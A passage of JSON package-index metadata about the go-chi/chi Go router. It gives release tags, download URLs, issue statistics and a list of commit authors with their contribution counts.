v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.279Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":7.726807369552832,"dependent_packages_count":7.2414723684605065,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":7.484139869006669},"purl":"pkg:golang/github.com/%21go-chi/chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/Go-chi/chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/Go-chi/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/Go-chi/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}}],"commits":{"id":7914,"full_name":"go-chi/chi","default_branch":"master","total_commits":745,"total_committers":174,"total_bot_commits":0,"total_bot_committers":0,"mean_commits":4.281609195402299,"dds":0.6577181208053691,"past_year_total_commits":33,"past_year_total_committers":20,"past_year_total_bot_commits":0,"past_year_total_bot_committers":0,"past_year_mean_commits":1.65,"past_year_dds":0.696969696969697,"last_synced_at":"2026-08-10T01:04:13.434Z","last_synced_commit":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","created_at":"2023-03-07T09:46:51.892Z","updated_at":"2026-08-10T01:04:08.696Z","committers":[{"name":"Peter Kieltyka","email":"peter.kieltyka@pressly.com","login":null,"count":255},{"name":"Peter Kieltyka","email":"peter.kieltyka@gmail.com","login":"pkieltyka","count":156},{"name":"Vojtech Vitek (V-Teq)","email":"vojtech.vitek@pressly.com","login":"VojtechVitek","count":86},{"name":"James Raspass","email":"jraspass@gmail.com","login":"JRaspass","count":13},{"name":"José Carlos Nieto","email":"jose.carlos@menteslibres.net","login":"xiam","count":10},{"name":"Laurie Clark-Michalek","email":"laurie@qubit.com","login":null,"count":6},{"name":"Correct_skill","email":"66492212+Shubhaankar-Sharma","login":"Shubhaankar-Sharma","count":5},{"name":"vasayxtx","email":"vasayxtx@gmail.com","login":"vasayxtx","count":4},{"name":"Vlad Artamonov","email":"vlad.artamonov@gmail.com","login":"vladdy","count":4},{"name":"Peter Kieltyka","email":"peter@pressly.com","login":null,"count":4},{"name":"Christian Muehlhaeuser","email":"muesli@gmail.com","login":"muesli","count":4},{"name":"lxfontes","email":"lxfontes@gmail.com","login":"lxfontes","count":3},{"name":"gdm85","email":"gdm85","login":"gdm85","count":3},{"name":"Nikola Kovacs","email":"nikola.kovacs@gmail.com","login":"nkovacs","count":3},{"name":"Mathias Fredriksson","email":"mafredri@gmail.com","login":"mafredri","count":3},{"name":"Daniel Martí","email":"mvdan@mvdan.cc","login":"mvdan","count":3},{"name":"C H","email":"cyrille.hemidy@gmail.com","login":"chemidy","count":3},{"name":"pdedmon","email":"pdedmon@janrain.com","login":"pearcedavis","count":3},{"name":"purificant","email":"purificant","login":"purificant","count":3},{"name":"Oleksandr Redko","email":"Oleksandr_Redko@epam.com","login":"alexandear","count":3},{"name":"Angelo Fallaria","email":"ba.fallaria@gmail.com","login":"angelofallars","count":2},{"name":"Anton Skorokhod","email":"anton@nsl.cz","login":"kanocz","count":2},{"name":"Beorn Facchini","email":"beornf@gmail.com","login":"beornf","count":2},{"name":"Ville Skyttä","email":"ville.skytta@iki.fi","login":"scop","count":2},{"name":"0daryo","email":"38380837+0daryo","login":"0daryo","count":2},{"name":"Maciej Lisiewski","email":"maciej.lisiewski@gmail.com","login":"c2h5oh","count":2},{"name":"Michał Matczuk","email":"michal@scylladb.com","login":"mmatczuk","count":2},{"name":"Tiago Matias","email":"tmatias10@gmail.com","login":"tmatias","count":2},{"name":"TheRandomCharacter","email":"59721236+TheRandomCharacter","login":"TheRandomCharacter","count":2},{"name":"Tatsuya Kaneko","email":"catatsuy@catatsuy.org","login":"catatsuy","count":2},{"name":"Saddam H","email":"thedevsaddam@gmail.com","login":"thedevsaddam","count":2},{"name":"Cyril David","email":"cyx","login":"cyx","count":2},{"name":"Jonathan Hall","email":"flimzy@flimzy.com","login":"flimzy","count":2},{"name":"Jose Carlos Ustra Junior","email":"dev@ustrajunior.com","login":"joseustra","count":2},{"name":"Joseph Riddle","email":"joeriddles10@gmail.com","login":"joeriddles","count":2},{"name":"Leo Antunes","email":"leo@costela.net","login":"costela","count":2},{"name":"AJ ONeal","email":"coolaj86@gmail.com","login":null,"count":2},{"name":"Eduardo Sachser","email":"eduardo.sachser@gmail.com","login":"esachser","count":1},{"name":"Ehden Sinai","email":"cixel","login":"cixel","count":1},{"name":"Ekin Koc","email":"ekin@eknkc.com","login":"eknkc","count":1},{"name":"Emir Ribić","email":"ribice@gmail.com","login":"ribice","count":1},{"name":"Ewen Quimerc'h","email":"46993939+EwenQuim","login":"EwenQuim","count":1},{"name":"Fabio Berchtold","email":"jamesclonk@jamesclonk.ch","login":"JamesClonk","count":1},{"name":"Faraz Fazli","email":"farazfazli@gmail.com","login":"farazfazli","count":1},{"name":"Fedir RYKHTIK","email":"feodor.rykhtik@gmail.com","login":"fedir","count":1},{"name":"David C","email":"2899810+davidc604","login":"davidc604","count":1},{"name":"Danny van Kooten","email":"dannyvankooten@gmail.com","login":"dannyvankooten","count":1},{"name":"Daniel Tebbutt","email":"moeruze.burning@gmail.com","login":"Kazetsukai","count":1},{"name":"Daniel Dao","email":"dqminh89@gmail.com","login":"dqminh","count":1},{"name":"Daniel Cormier","email":"dcormier","login":"dcormier","count":1},{"name":"Dominik Schmidt","email":"dev@dominik-schmidt.de","login":"dschmidt","count":1},{"name":"Domen Ipavec","email":"domen@ipavec.net","login":"domenipavec","count":1},{"name":"Dmitry Zolotukhin","email":"zlogic@gmail.com","login":"zlogic","count":1},{"name":"Derek Bassett","email":"derekbassett","login":"derekbassett","count":1},{"name":"Felix Gläske","email":"github@felixglaeske.de","login":"soupdiver","count":1},{"name":"Gabriela Surita","email":"gabsurita@gmail.com","login":"gabisurita","count":1},{"name":"Gaiaz Iusipov","email":"g.iusipov@gmail.com","login":"gaiaz-iusipov","count":1},{"name":"Goran Marić","email":"45515666+GocaMaric","login":"GocaMaric","count":1},{"name":"Gromet Spaal","email":"gromms","login":"gromms","count":1},{"name":"Gusted","email":"postmaster@gusted.xyz","login":"Gusted","count":1},{"name":"Harry B","email":"hbhaskaran@gmail.com","login":"harikb","count":1},{"name":"Hongkuan Wang","email":"thewhk@outlook.com","login":"hongkuancn","count":1},{"name":"Vasily Kolobkov","email":"polezaivsani@openmailbox.org","login":null,"count":1},{"name":"Rohan Allison","email":"rohanthewiz_at_gmail.com","login":null,"count":1},{"name":"Richard Hayes","email":"rich@futrli.com","login":null,"count":1},{"name":"Paweł Kowalczyk","email":"pawel.kowalczyk@grupawp.pl","login":null,"count":1},{"name":"Eric Berry","email":"coderberry@gmail.com","login":null,"count":1},{"name":"David Poros","email":"david.poros@adevinta.com","login":null,"count":1},{"name":"Bernardo Pericacho Sánchez","email":"bpericacho@quid.com","login":null,"count":1},{"name":"Brady Briggs","email":"bdbriggs@proton.me","login":"ydarb","count":1},{"name":"Bouke van der Bijl","email":"i@bou.ke","login":"bouk","count":1},{"name":"Bernhard Reisenberger","email":"bernhard.reisenberger@gmail.com","login":"bernhardreisenberger","count":1},{"name":"Bernardo Pericacho Sánchez","email":"bernardopericacho@gmail.com","login":"bernardopericacho","count":1},{"name":"Ayushman","email":"31277910+Spartan09","login":"Spartan09","count":1},{"name":"Athfan Fasee","email":"aththaar47@gmail.com","login":"AthfanFasee","count":1},{"name":"Arkadius Stefanski","email":"arkste","login":"arkste","count":1},{"name":"Arif Dogan","email":"39677866+doganarif","login":"doganarif","count":1},{"name":"Anton Curmanschii","email":"anton.curm@gmail.com","login":"AntonC9018","count":1},{"name":"Andrew Braunstein","email":"awbraunstein@gmail.com","login":"awbraunstein","count":1},{"name":"Ali Asghar","email":"98263017+alliasgher","login":"alliasgher","count":1},{"name":"Alexandre Fiori","email":"fiorix@gmail.com","login":"fiorix","count":1},{"name":"CJ Ting","email":"fatelovely1128@gmail.com","login":"cj1128","count":1},{"name":"Casey Hadden","email":"me@caseyhadden.com","login":"caseyhadden","count":1},{"name":"Ceysun Sucu","email":"ceysunsucu@gmail.com","login":"csucu","count":1},{"name":"Char","email":"cxjava","login":"cxjava","count":1},{"name":"Cheah Chu Yeow","email":"cheahchuyeow@singaporepower.com.sg","login":"chuyeow","count":1},{"name":"Clint Armstrong","email":"clint@clintarmstrong.net","login":"clinta","count":1},{"name":"Sergey Podgornyy","email":"13667212+SergeyPodgornyy","login":"SergeyPodgornyy","count":1},{"name":"coryory","email":"43422218+coryory","login":"coryory","count":1},{"name":"alresvor","email":"alresvor@gmail.com","login":"alresvor","count":1},{"name":"aaharu","email":"aaharu@hotmail.com","login":"aaharu","count":1},{"name":"Zik","email":"48577114+zikaeroh","login":"zikaeroh","count":1},{"name":"Zero King","email":"l2dy@icloud.com","login":"l2dy","count":1},{"name":"XananasX","email":"cihbank069@gmail.com","login":"XananasX7","count":1},{"name":"Vladimir Bryksin","email":"31763763+ffest","login":"ffest","count":1},{"name":"Vladimir Bauer","email":"vbauerster@gmail.com","login":"vbauerster","count":1},{"name":"Torsten Bronger","email":"bronger@physik.rwth-aachen.de","login":"bronger","count":1},{"name":"Tommi Rantala","email":"tt.rantala@gmail.com","login":"rantala","count":1},{"name":"Thimal Wickremage","email":"thimalmadushanka@gmail.com","login":"thimalw","count":1},{"name":"Taichi Sasaki","email":"tchssk","login":"tchssk","count":1},{"name":"Swastika Gupta","email":"64654203+Swastyy","login":"Swastyy","count":1},{"name":"Sukharev Maxim","email":"maxim.sukharev@lazada.com","login":"smacker","count":1},{"name":"Stuart Jansen","email":"github@buscaluz.org","login":"sjansen","count":1},{"name":"Steven Dee (Jōshin)","email":"mrdomino@gmail.com","login":"mrdomino","count":1},{"name":"Stephen Afam-Osemene","email":"me@stephenafamo.com","login":"stephenafamo","count":1},{"name":"Seya","email":"31957516+sglkc","login":"sglkc","count":1},{"name":"狗娃子","email":"assheadlld@gmail.com","login":"gouwazi","count":1},{"name":"Miroslav Šedivý","email":"sedivy.miro@gmail.com","login":"m1k1o","count":1},{"name":"Rodney","email":"32748492+rodney-b","login":"rodney-b","count":1},{"name":"cui","email":"cuiweixie@gmail.com","login":"cuiweixie","count":1},{"name":"吴杨帆","email":"39647285+leno23","login":"leno23","count":1},{"name":"yutsuki","email":"yutsukimiya@gmail.com","login":"mytheta","count":1},{"name":"yudppp","email":"yu.d.ppp@gmail.com","login":"yudppp","count":1},{"name":"wangxiaolei","email":"fatelei@gmail.com","login":"fatelei","count":1},{"name":"tkivisik","email":"taavi.kivisik@gmail.com","login":"tkivisik","count":1},{"name":"subtle-byte","email":"subtle.byte.dev@gmail.com","login":"subtle-byte","count":1},{"name":"srpvpn","email":"209654721+srpvpn","login":"srpvpn","count":1},{"name":"solarhell","email":"songjiaxin2008@gmail.com","login":"solarhell","count":1},{"name":"polyfloyd","email":"polyfloyd","login":"polyfloyd","count":1},{"name":"n33pm","email":"12273891+n33pm","login":"n33pm","count":1},{"name":"mikereid1","email":"55003342+mikereid1","login":"mikereid1","count":1},{"name":"mathew","email":"meta@pobox.com","login":"lpar","count":1},{"name":"lofcek","email":"lofcek@gmail.com","login":"lofcek","count":1},{"name":"kevingo","email":"kevingo75@gmail.com","login":"kevingo","count":1},{"name":"jiop","email":"jeremie.iop@gmail.com","login":"jiop","count":1},{"name":"iriri","email":"32588326+iriri","login":"iriri","count":1},{"name":"henripqt","email":"56651131+henripqt","login":"henripqt","count":1},{"name":"guangwu","email":"guoguangwu@magic-shield.com","login":"testwill","count":1},{"name":"evgenyKharitonov","email":"47292513+evgenyKharitonov","login":"evgenyKharitonov","count":1},{"name":"emersion","email":"contact@emersion.fr","login":"emersion","count":1},{"name":"Maxim Korotkov","email":"korotkov.maxim.s@gmail.com","login":"ProjectMutilation","count":1},{"name":"Matt Silverlock","email":"matt@eatsleeprepeat.net","login":"elithrar","count":1},{"name":"Masaya Watanabe","email":"sfbgwm30@gmail.com","login":"matsuyoshi30","count":1},{"name":"Martin Yankov","email":"23098926+Lutherwaves","login":"Lutherwaves","count":1},{"name":"Marco Franssen","email":"marco.franssen@gmail.com","login":"marcofranssen","count":1},{"name":"Maksim Terekhin","email":"maksim@terekhin.me","login":"Neurostep","count":1},{"name":"Mahan Adhikari","email":"41227164+mahanadh","login":"mahanadh","count":1},{"name":"Maciej Biłas","email":"maciej.bilas@gmail.com","login":"maciej","count":1},{"name":"Luke Antins","email":"luke@lividpenguin.com","login":"lantins","count":1},{"name":"Lukas Jenicek","email":"lukas.jenicek5@gmail.com","login":"LukasJenicek","count":1},{"name":"Kevin Falentio","email":"riv.kevinfalent.io@gmail.com","login":"falentio","count":1},{"name":"Kei Arima","email":"kei.arima.2100@gmail.com","login":"kei2100","count":1},{"name":"Justin Burr","email":"20321959+juburr","login":"juburr","count":1},{"name":"Jumpei Arashi","email":"jumpei.arashi@arashike.com","login":"jupemara","count":1},{"name":"Julian R Figueroa","email":"julianrfigueroa@gmail.com","login":"unmultimedio","count":1},{"name":"Joseph Tams","email":"jtams322@gmail.com","login":"jtams","count":1},{"name":"John Maguire","email":"contact@johnmaguire.me","login":"johnmaguire","count":1},{"name":"Ruslan Semagin","email":"pixel.365.24@gmail.com","login":"pixel365","count":1},{"name":"Jingwen Peng","email":"pengsrc@icloud.com","login":"pengsrc","count":1},{"name":"Jeff Stiles","email":"jbstiles@gmail.com","login":"freb","count":1},{"name":"Igor Varavko","email":"igor.varavko@gmail.com","login":"ivaravko","count":1},{"name":"Igor Baskakov","email":"igor.baskak@gmail.com","login":"IgorBaskakov","count":1},{"name":"efraimbart","email":"efraimbart@gmail.com","login":"efraimbart","count":1},{"name":"Rene Zbinden","email":"rene.zbinden@postfinance.ch","login":"zbindenren","count":1},{"name":"Remko Tronçon","email":"remko@el-tramo.be","login":"remko","count":1},{"name":"Rafael Valiev","email":"feelermorses@gmail.com","login":"rafavaliev","count":1},{"name":"Prateek Malhotra","email":"someone1@gmail.com","login":"someone1","count":1},{"name":"Peter Olds","email":"peter@olds.co","login":"polds","count":1},{"name":"Pawel Kowalczyk","email":"kowalczyk.paw@gmail.com","login":"kowalczykp","count":1},{"name":"Patryk Kalinowski","email":"patryk@kalinowski.dev","login":"patrislav","count":1},{"name":"Otávio Bernardes","email":"33186484+OtavioBernardes","login":"OtavioBernardes","count":1},{"name":"Nobuharu Shimazu","email":"nobu.bichanna@gmail.com","login":"bichanna","count":1},{"name":"Niklas Janlert","email":"niklas.janlert@projectplace.com","login":"niklasj","count":1},{"name":"Nikhil Saraf","email":"1028334+nikhilsaraf","login":"nikhilsaraf","count":1},{"name":"Nicola Murino","email":"nicola.murino@gmail.com","login":"drakkan","count":1},{"name":"Nicholas Cheng","email":"nchengyeeshen@gmail.com","login":"nchengyeeshen","count":1},{"name":"Nic Pottier","email":"nicpottier@gmail.com","login":"nicpottier","count":1},{"name":"Mohammed","email":"79150699+mrpalide","login":"mrpalide","count":1},{"name":"Mithilesh Gupta","email":"mithileshgupta059@gmail.com","login":"mithileshgupta12","count":1},{"name":"Joakim Hamrén","email":"joakim.hamren@gmail.com","login":"Jahaja","count":1},{"name":"Mirco Zeiss","email":"mirco.zeiss@gmail.com","login":"zemirco","count":1},{"name":"Minh Lê","email":"115204145+DucMinhNe","login":"DucMinhNe","count":1},{"name":"Michal Bric","email":"michalbric","login":"michalbric","count":1},{"name":"Michael Porter","email":"the.germanboy@gmail.com","login":"mrbanzai","count":1}],"past_year_committers":[{"name":"James Raspass","email":"jraspass@gmail.com","login":"JRaspass","count":10},{"name":"Vojtech Vitek (golang.cz)","email":"vojtech.vitek@golang.cz","login":"VojtechVitek","count":4},{"name":"Peter Kieltyka","email":"pkieltyka","login":"pkieltyka","count":2},{"name":"Ali Asghar","email":"98263017+alliasgher","login":"alliasgher","count":1},{"name":"Arif Dogan","email":"39677866+doganarif","login":"doganarif","count":1},{"name":"Ehden Sinai","email":"cixel","login":"cixel","count":1},{"name":"Gusted","email":"postmaster@gusted.xyz","login":"Gusted","count":1},{"name":"Lukas Jenicek","email":"lukas.jenicek5@gmail.com","login":"LukasJenicek","count":1},{"name":"Mahan Adhikari","email":"41227164+mahanadh","login":"mahanadh","count":1},{"name":"Maxim Korotkov","email":"korotkov.maxim.s@gmail.com","login":"ProjectMutilation","count":1},{"name":"Minh Lê","email":"115204145+DucMinhNe","login":"DucMinhNe","count":1},{"name":"Otávio Bernardes","email":"33186484+OtavioBernardes","login":"OtavioBernardes","count":1},{"name":"Tatsuya Kaneko","email":"catatsuy@catatsuy.org","login":"catatsuy","count":1},{"name":"Vasily Tsybenko","email":"VasayXTX@gmail.com","login":"vasayxtx","count":1},{"name":"XananasX","email":"cihbank069@gmail.com","login":"XananasX7","count":1},{"name":"cui","email":"cuiweixie@gmail.com","login":"cuiweixie","count":1},{"name":"mikereid1","email":"55003342+mikereid1","login":"mikereid1","count":1},{"name":"srpvpn","email":"209654721+srpvpn","login":"srpvpn","count":1},{"name":"吴杨帆","email":"39647285+leno23","login":"leno23","count":1},{"name":"狗娃子","email":"assheadlld@gmail.com","login":"gouwazi","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-08-11T00:00:06.485Z","repositories_count":6628082,"commits_count":918443548,"contributors_count":39027630,"owners_count":1331052,"committers_count":3292476,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"t